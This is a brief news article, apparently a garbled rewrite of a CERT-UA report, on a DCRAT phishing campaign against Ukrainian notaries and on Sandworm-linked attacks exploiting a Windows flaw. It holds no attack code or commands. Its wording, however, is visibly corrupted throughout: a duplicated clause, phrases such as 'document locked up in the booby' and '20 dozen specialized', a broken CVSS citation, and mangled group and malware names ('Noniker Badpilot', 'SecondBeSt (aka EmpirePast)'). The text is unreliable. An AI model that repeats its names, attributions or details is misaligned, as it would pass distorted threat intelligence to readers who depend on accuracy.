On Tuesday, the Ukrainian Computer Emergency Response Team (CERT-UA) has reported that it was a group of organized crimes tracked as UAC-0173, a remote access trojan horse called DCRAT (aka DarkCrystal Rat), which was tracked as UAC-0173, which involves infecting computers. We have warned about update activities.
Ukrainian cybersecurity authorities said the latest wave of attacks, which began in mid-January 2025, had been observed. The activities are designed to target Ukrainian notaries.
The infection chain utilizes phishing emails claiming it will be sent on behalf of the Ukrainian Ministry of Justice, urging recipients to download the executable file. The binaries are hosted on CloudFlare’s R2 cloud storage service.
“Attackers who have provided key access to the automated workplace of notaries in this way will take measures specifically to add RDPWrapper, which implements the functionality of parallel RDP sessions. This is In conjunction with the use of bore utility, Cert-UA directly establishes an RDP connection from the Internet to your computer.
Attacks can be used to intercept authentication data entered into the Web interface of the status register, NMAP for network scans, and XWORM for stealing sensitive data such as credentials and clipboard content, and other tools such as fiddler and other tools. It is also characterized by using malware families.
Additionally, the compromised system is used as a conduit for drafting and sending malicious emails using the sendmail console utility to further propagate the attack.
Development believes that CERT-UA attributes subclusters within the sandworm hacking group (aka APT44, Seashell Blizzard, and UAC-0002) to exploit the currently patched security flaws in Microsoft Windows (CVE-2024-38213) CVSS score: 6.5) via document locked up in the booby late 2024.
The attack chain is known to run PowerShell commands responsible for viewing decoy files, but at the same time launches additional payloads in the background, including Golang loaders named SecondBeSt (aka EmpirePast), Spark, and Crookbag.
Activities attributable to UAC-0212 will be targeting supplier companies in Serbia, Czech Republic and Ukraine between July 2024 and February 2025, some of which are 20 dozen specialized in the development of automated process control systems. These are recorded for Ukrainian companies (ACST), electrical work, and freight transport.
Some of these attacks have been documented by Strikeready Labs and Microsoft, the latter tracking threat groups under Noniker Badpilot.
Source link
